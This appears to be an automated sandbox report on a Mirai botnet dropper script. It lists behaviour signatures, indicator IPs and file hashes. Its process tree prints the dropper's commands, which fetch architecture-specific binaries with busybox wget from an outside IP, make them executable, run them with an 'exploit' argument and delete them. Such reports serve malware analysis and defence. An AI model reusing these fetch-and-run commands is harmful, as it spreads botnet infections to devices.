Analysis
-
max time kernel
150s -
max time network
151s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
18-02-2025 03:33
Static task
static1
Behavioral task
behavioral1
Sample
dd5851b5ab04287b30ed4d1bed6f7940d256849c8d6cfc9936df59afa4c328aa.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
dd5851b5ab04287b30ed4d1bed6f7940d256849c8d6cfc9936df59afa4c328aa.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
dd5851b5ab04287b30ed4d1bed6f7940d256849c8d6cfc9936df59afa4c328aa.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
dd5851b5ab04287b30ed4d1bed6f7940d256849c8d6cfc9936df59afa4c328aa.sh
Resource
debian9-mipsel-20240418-en
General
-
Target
dd5851b5ab04287b30ed4d1bed6f7940d256849c8d6cfc9936df59afa4c328aa.sh
-
Size
1KB
-
MD5
d011eee1c3ee60b1a1db3ae1e9e65ad6
-
SHA1
18f4cee16484157375f8bbcf21acca220a258d66
-
SHA256
dd5851b5ab04287b30ed4d1bed6f7940d256849c8d6cfc9936df59afa4c328aa
-
SHA512
ed73548c60e65449f31d4bc5ca644d2f59e72d0843a24b3236707338fbed8e26ed608897d0c5a26a971357e7d28b92a9ecb6d8d76d5f7d55e93bf0aa3dd3f6ac
Malware Config
Extracted
mirai
BOTNET
Extracted
mirai
BOTNET
Signatures
-
Mirai family
-
Contacts a large (176180) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
File and Directory Permissions Modification 1 TTPs 12 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 804 busybox 813 busybox 819 busybox 831 busybox 786 busybox 741 busybox 747 busybox 752 busybox 767 busybox 826 busybox 836 busybox 730 busybox -
Deletes itself 1 IoCs
pid Process 787 jklmips -
Executes dropped EXE 7 IoCs
ioc pid Process /tmp/jklarm 731 dd5851b5ab04287b30ed4d1bed6f7940d256849c8d6cfc9936df59afa4c328aa.sh /tmp/jklarm5 743 dd5851b5ab04287b30ed4d1bed6f7940d256849c8d6cfc9936df59afa4c328aa.sh /tmp/jklarm6 748 dd5851b5ab04287b30ed4d1bed6f7940d256849c8d6cfc9936df59afa4c328aa.sh /tmp/jklarm7 753 dd5851b5ab04287b30ed4d1bed6f7940d256849c8d6cfc9936df59afa4c328aa.sh /tmp/jklm68k 769 dd5851b5ab04287b30ed4d1bed6f7940d256849c8d6cfc9936df59afa4c328aa.sh /tmp/jklmips 787 dd5851b5ab04287b30ed4d1bed6f7940d256849c8d6cfc9936df59afa4c328aa.sh /tmp/jklmpsl 806 dd5851b5ab04287b30ed4d1bed6f7940d256849c8d6cfc9936df59afa4c328aa.sh -
Modifies Watchdog functionality 1 TTPs 2 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
description ioc Process File opened for modification /dev/watchdog jklmips File opened for modification /dev/misc/watchdog jklmips -
Renames itself 1 IoCs
pid Process 787 jklmips -
Unexpected DNS network traffic destination 25 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
description ioc Destination IP 194.36.144.87 Destination IP 194.36.144.87 Destination IP 185.181.61.24 Destination IP 51.158.108.203 Destination IP 152.53.15.127 Destination IP 202.61.197.122 Destination IP 202.61.197.122 Destination IP 185.181.61.24 Destination IP 51.158.108.203 Destination IP 51.158.108.203 Destination IP 152.53.15.127 Destination IP 202.61.197.122 Destination IP 185.181.61.24 Destination IP 194.36.144.87 Destination IP 194.36.144.87 Destination IP 185.181.61.24 Destination IP 194.36.144.87 Destination IP 194.36.144.87 Destination IP 202.61.197.122 Destination IP 185.181.61.24 Destination IP 51.158.108.203 Destination IP 51.158.108.203 Destination IP 81.169.136.222 Destination IP 152.53.15.127 Destination IP 185.181.61.24 -
Enumerates active TCP sockets 1 TTPs 1 IoCs
Gets active TCP sockets from /proc virtual filesystem.
description ioc Process File opened for reading /proc/net/tcp jklmips -
Enumerates running processes
Discovers information about currently running processes on the system
-
Reads process memory 1 TTPs 51 IoCs
Read the memory of a process through the /proc virtual filesystem. This can be used to steal credentials.
description ioc Process File opened for reading /proc/824/maps jklmips File opened for reading /proc/842/maps jklmips File opened for reading /proc/857/maps jklmips File opened for reading /proc/862/maps jklmips File opened for reading /proc/814/maps jklmips File opened for reading /proc/822/maps jklmips File opened for reading /proc/815/maps jklmips File opened for reading /proc/816/maps jklmips File opened for reading /proc/859/maps jklmips File opened for reading /proc/863/maps jklmips File opened for reading /proc/865/maps jklmips File opened for reading /proc/867/maps jklmips File opened for reading /proc/810/maps jklmips File opened for reading /proc/812/maps jklmips File opened for reading /proc/813/maps jklmips File opened for reading /proc/826/maps jklmips File opened for reading /proc/827/maps jklmips File opened for reading /proc/832/maps jklmips File opened for reading /proc/835/maps jklmips File opened for reading /proc/849/maps jklmips File opened for reading /proc/806/maps jklmips File opened for reading /proc/808/maps jklmips File opened for reading /proc/870/maps jklmips File opened for reading /proc/853/maps jklmips File opened for reading /proc/866/maps jklmips File opened for reading /proc/830/maps jklmips File opened for reading /proc/831/maps jklmips File opened for reading /proc/837/maps jklmips File opened for reading /proc/823/maps jklmips File opened for reading /proc/825/maps jklmips File opened for reading /proc/836/maps jklmips File opened for reading /proc/848/maps jklmips File opened for reading /proc/861/maps jklmips File opened for reading /proc/817/maps jklmips File opened for reading /proc/828/maps jklmips File opened for reading /proc/818/maps jklmips File opened for reading /proc/819/maps jklmips File opened for reading /proc/843/maps jklmips File opened for reading /proc/845/maps jklmips File opened for reading /proc/807/maps jklmips File opened for reading /proc/811/maps jklmips File opened for reading /proc/833/maps jklmips File opened for reading /proc/841/maps jklmips File opened for reading /proc/847/maps jklmips File opened for reading /proc/851/maps jklmips File opened for reading /proc/805/maps jklmips File opened for reading /proc/821/maps jklmips File opened for reading /proc/838/maps jklmips File opened for reading /proc/855/maps jklmips File opened for reading /proc/820/maps jklmips File opened for reading /proc/829/maps jklmips -
Changes its process name 1 IoCs
description pid Process Changes the process name, possibly in an attempt to hide itself 787 jklmips -
Reads system network configuration 1 TTPs 1 IoCs
Uses contents of /proc filesystem to enumerate network settings.
description ioc Process File opened for reading /proc/net/tcp jklmips -
description ioc Process File opened for reading /proc/235/status jklmips File opened for reading /proc/701/status jklmips File opened for reading /proc/824/cmdline jklmips File opened for reading /proc/861/cmdline jklmips File opened for reading /proc/867/cmdline jklmips File opened for reading /proc/702/status jklmips File opened for reading /proc/713/status jklmips File opened for reading /proc/842/cmdline jklmips File opened for reading /proc/862/cmdline jklmips File opened for reading /proc/432/status jklmips File opened for reading /proc/845/cmdline jklmips File opened for reading /proc/848/cmdline jklmips File opened for reading /proc/866/cmdline jklmips File opened for reading /proc/819/cmdline jklmips File opened for reading /proc/833/cmdline jklmips File opened for reading /proc/154/status jklmips File opened for reading /proc/677/status jklmips File opened for reading /proc/807/cmdline jklmips File opened for reading /proc/808/cmdline jklmips File opened for reading /proc/815/cmdline jklmips File opened for reading /proc/816/cmdline jklmips File opened for reading /proc/857/cmdline jklmips File opened for reading /proc/self/maps jklmips File opened for reading /proc/836/cmdline jklmips File opened for reading /proc/865/cmdline jklmips File opened for reading /proc/320/status jklmips File opened for reading /proc/785/status jklmips File opened for reading /proc/813/cmdline jklmips File opened for reading /proc/849/cmdline jklmips File opened for reading /proc/851/cmdline jklmips File opened for reading /proc/322/status jklmips File opened for reading /proc/385/status jklmips File opened for reading /proc/806/cmdline jklmips File opened for reading /proc/817/cmdline jklmips File opened for reading /proc/835/cmdline jklmips File opened for reading /proc/179/status jklmips File opened for reading /proc/374/status jklmips File opened for reading /proc/822/cmdline jklmips File opened for reading /proc/830/cmdline jklmips File opened for reading /proc/837/cmdline jklmips File opened for reading /proc/324/status jklmips File opened for reading /proc/843/cmdline jklmips File opened for reading /proc/853/cmdline jklmips File opened for reading /proc/710/status jklmips File opened for reading /proc/823/cmdline jklmips File opened for reading /proc/828/cmdline jklmips File opened for reading /proc/841/cmdline jklmips File opened for reading /proc/674/status jklmips File opened for reading /proc/810/cmdline jklmips File opened for reading /proc/814/cmdline jklmips File opened for reading /proc/826/cmdline jklmips File opened for reading /proc/831/cmdline jklmips File opened for reading /proc/838/cmdline jklmips File opened for reading /proc/325/status jklmips File opened for reading /proc/350/status jklmips File opened for reading /proc/669/status jklmips File opened for reading /proc/820/cmdline jklmips File opened for reading /proc/821/cmdline jklmips File opened for reading /proc/825/cmdline jklmips File opened for reading /proc/676/status jklmips File opened for reading /proc/687/status jklmips File opened for reading /proc/827/cmdline jklmips File opened for reading /proc/859/cmdline jklmips File opened for reading /proc/720/status jklmips -
System Network Configuration Discovery 1 TTPs 3 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 773 busybox 787 jklmips 789 busybox -
Writes file to tmp directory 7 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/jklarm6 busybox File opened for modification /tmp/jklarm7 busybox File opened for modification /tmp/jklm68k busybox File opened for modification /tmp/jklmips busybox File opened for modification /tmp/jklmpsl busybox File opened for modification /tmp/jklarm busybox File opened for modification /tmp/jklarm5 busybox
Processes
-
/tmp/dd5851b5ab04287b30ed4d1bed6f7940d256849c8d6cfc9936df59afa4c328aa.sh/tmp/dd5851b5ab04287b30ed4d1bed6f7940d256849c8d6cfc9936df59afa4c328aa.sh1⤵
- Executes dropped EXE
PID:710 -
/bin/busybox/bin/busybox wget http://193.143.1.32/jklarm -O jklarm2⤵
- Writes file to tmp directory
PID:711
-
-
/bin/busybox/bin/busybox chmod +x jklarm2⤵
- File and Directory Permissions Modification
PID:730
-
-
/tmp/jklarm./jklarm exploit2⤵PID:731
-
-
/bin/busybox/bin/busybox rm -rf jklarm2⤵PID:733
-
-
/bin/busybox/bin/busybox wget http://193.143.1.32/jklarm5 -O jklarm52⤵
- Writes file to tmp directory
PID:734
-
-
/bin/busybox/bin/busybox chmod +x jklarm52⤵
- File and Directory Permissions Modification
PID:741
-
-
/tmp/jklarm5./jklarm5 exploit2⤵PID:743
-
-
/bin/busybox/bin/busybox rm -rf jklarm52⤵PID:745
-
-
/bin/busybox/bin/busybox wget http://193.143.1.32/jklarm6 -O jklarm62⤵
- Writes file to tmp directory
PID:746
-
-
/bin/busybox/bin/busybox chmod +x jklarm62⤵
- File and Directory Permissions Modification
PID:747
-
-
/tmp/jklarm6./jklarm6 exploit2⤵PID:748
-
-
/bin/busybox/bin/busybox rm -rf jklarm62⤵PID:750
-
-
/bin/busybox/bin/busybox wget http://193.143.1.32/jklarm7 -O jklarm72⤵
- Writes file to tmp directory
PID:751
-
-
/bin/busybox/bin/busybox chmod +x jklarm72⤵
- File and Directory Permissions Modification
PID:752
-
-
/tmp/jklarm7./jklarm7 exploit2⤵PID:753
-
-
/bin/busybox/bin/busybox rm -rf jklarm72⤵PID:755
-
-
/bin/busybox/bin/busybox wget http://193.143.1.32/jklm68k -O jklm68k2⤵
- Writes file to tmp directory
PID:756
-
-
/bin/busybox/bin/busybox chmod +x jklm68k2⤵
- File and Directory Permissions Modification
PID:767
-
-
/tmp/jklm68k./jklm68k exploit2⤵PID:769
-
-
/bin/busybox/bin/busybox rm -rf jklm68k2⤵PID:772
-
-
/bin/busybox/bin/busybox wget http://193.143.1.32/jklmips -O jklmips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:773
-
-
/bin/busybox/bin/busybox chmod +x jklmips2⤵
- File and Directory Permissions Modification
PID:786
-
-
/tmp/jklmips./jklmips exploit2⤵
- Deletes itself
- Modifies Watchdog functionality
- Renames itself
- Enumerates active TCP sockets
- Reads process memory
- Changes its process name
- Reads system network configuration
- Reads runtime system information
- System Network Configuration Discovery
PID:787
-
-
/bin/busybox/bin/busybox rm -rf jklmips2⤵
- System Network Configuration Discovery
PID:789
-
-
/bin/busybox/bin/busybox wget http://193.143.1.32/jklmpsl -O jklmpsl2⤵
- Writes file to tmp directory
PID:791
-
-
/bin/busybox/bin/busybox chmod +x jklmpsl2⤵
- File and Directory Permissions Modification
PID:804
-
-
/tmp/jklmpsl./jklmpsl exploit2⤵PID:806
-
-
/bin/busybox/bin/busybox rm -rf jklmpsl2⤵PID:810
-
-
/bin/busybox/bin/busybox wget http://193.143.1.32/jklppc -O jklppc2⤵PID:812
-
-
/bin/busybox/bin/busybox chmod +x jklppc2⤵
- File and Directory Permissions Modification
PID:813
-
-
/tmp/jklppc./jklppc exploit2⤵PID:815
-
-
/bin/busybox/bin/busybox rm -rf jklppc2⤵PID:817
-
-
/bin/busybox/bin/busybox wget http://193.143.1.32/jklsh4 -O jklsh42⤵PID:818
-
-
/bin/busybox/bin/busybox chmod +x jklsh42⤵
- File and Directory Permissions Modification
PID:819
-
-
/tmp/jklsh4./jklsh4 exploit2⤵PID:821
-
-
/bin/busybox/bin/busybox rm -rf jklsh42⤵PID:824
-
-
/bin/busybox/bin/busybox wget http://193.143.1.32/jklspc -O jklspc2⤵PID:825
-
-
/bin/busybox/bin/busybox chmod +x jklspc2⤵
- File and Directory Permissions Modification
PID:826
-
-
/tmp/jklspc./jklspc exploit2⤵PID:828
-
-
/bin/busybox/bin/busybox rm -rf jklspc2⤵PID:829
-
-
/bin/busybox/bin/busybox wget http://193.143.1.32/jklx86 -O jklx862⤵PID:830
-
-
/bin/busybox/bin/busybox chmod +x jklx862⤵
- File and Directory Permissions Modification
PID:831
-
-
/tmp/jklx86./jklx86 exploit2⤵PID:832
-
-
/bin/busybox/bin/busybox rm -rf jklx862⤵PID:834
-
-
/bin/busybox/bin/busybox wget http://193.143.1.32/jklarc -O jklarc2⤵PID:835
-
-
/bin/busybox/bin/busybox chmod +x jklarc2⤵
- File and Directory Permissions Modification
PID:836
-
-
/tmp/jklarc./jklarc exploit2⤵PID:837
-
-
/bin/busybox/bin/busybox rm -rf jklarc2⤵PID:838
-
-
/bin/busybox/bin/busybox rm -rf wget.sh2⤵PID:839
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Impair Defenses
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
54KB
MD560323049a9468c264a9535600a053b6e
SHA1960ec393b1590fee232414d8d8f279b189573b6f
SHA2563ac4757c406bac2bedd2771c5c137607e2788099782ca939cb40c32aa2c71343
SHA512e1e33d7bf40b34e4a90a88b2ada4822dc150ae705ae118f2a169f1dc427a4bad4fcc6a0e3e668483024395ae9005d2bef1ac82952774b359063dbc6f32e44954
-
Filesize
54KB
MD5368f814e3fcc026df077492406916cfb
SHA194a499401b79d75a6c1df3eb205dc44057425f5b
SHA2564cb919fe578f5a95e86157987898bb2959019260992578f42e7abd79f3d864ce
SHA512e334932543ea5bead5ea96f13191f967e63893b92ffa2fe6793afe5d39615f46c2b62ab4ff8846f78cffeb32dd51ae6a88ba36dd59cab8da75a1cbd0f1b842cc
-
Filesize
65KB
MD53efe981dfb09404a90020f31b91a0d99
SHA175dad217f8faab13473fa87f1f90cfab16646e67
SHA256b0200c4648356ccc6af1711e1673c133c8f785611b10d49f925958507bb8b213
SHA5126f5068a4d9fa7e6db711cb6207a3316a24d58d68e6996e211d6a10ac5eee3b67adbd8677d7f4061eac2476b5596c9c767055ab3a19bcf569137c7ca3ed8177fc
-
Filesize
77KB
MD582feacfdba7096dd1f30ae81b443ed99
SHA11ffc5f931d6bbf76e3ae065033fc5cb95a9e8a33
SHA256dec770c2901a222ec48915adfe1f7c6091fc3e9b03941a53f44b21593af862d2
SHA51207f59c67b2c32911d031816713ad9bcd36f2b3beaf9c7645c1d3b73fc29fb2d09aef648a08fd6f83037bf3731d287babcfc7c228fac7af465bc79ad325477c9d
-
Filesize
55KB
MD50e6cf4992f8f2394394ca5972339a663
SHA1acd7245a3e7b0f394100658336e10aaa2774771d
SHA25630c5e7b561a3e61ab67af8181fd6b996258325bf8137531ffe9d2b3f438a3d46
SHA51266f9c4f37e8c039a2b435a213629992a88b15609f3d449b1552a5aade52981d8679b1f949b35d9edfc2522a2c5acd4efbb4ed55b64ec08d55818205b8cc78c10
-
Filesize
70KB
MD59f505111a75f65954723020bee516bc1
SHA10aa2fbd97682553fcfd5a6494e09498c04df96b3
SHA2565e2d9f9531aff471dd5d92b772c57ba66cfb39aefef46fb878f3d30db9a8c1c8
SHA51266fe3d79c76e4c773b6512f90ed9b3dd60cba157882a8093931c60c5771191c1c8442ee96121fb9e578056dfa91a6878f4271e1e2e02fdd4c73d50e33ceac640
-
Filesize
74KB
MD5e21d64812567d5607c06f765f06b40c2
SHA1c05d80301c864dbc3b4176406fb2e33870f916ed
SHA2563132f0d33ba9fc64e8258e2094745f4fe60d4f044b5b8fe0aef5e311d9e0adaf
SHA51230a3416d773cb0bc0f68a8198e860d31c0c9e860f43338ba4dcb2fc2ccfa254ddf9b390ead160935235db6a7509f1caaea2c8b148743e400591c764ec3e5e9e5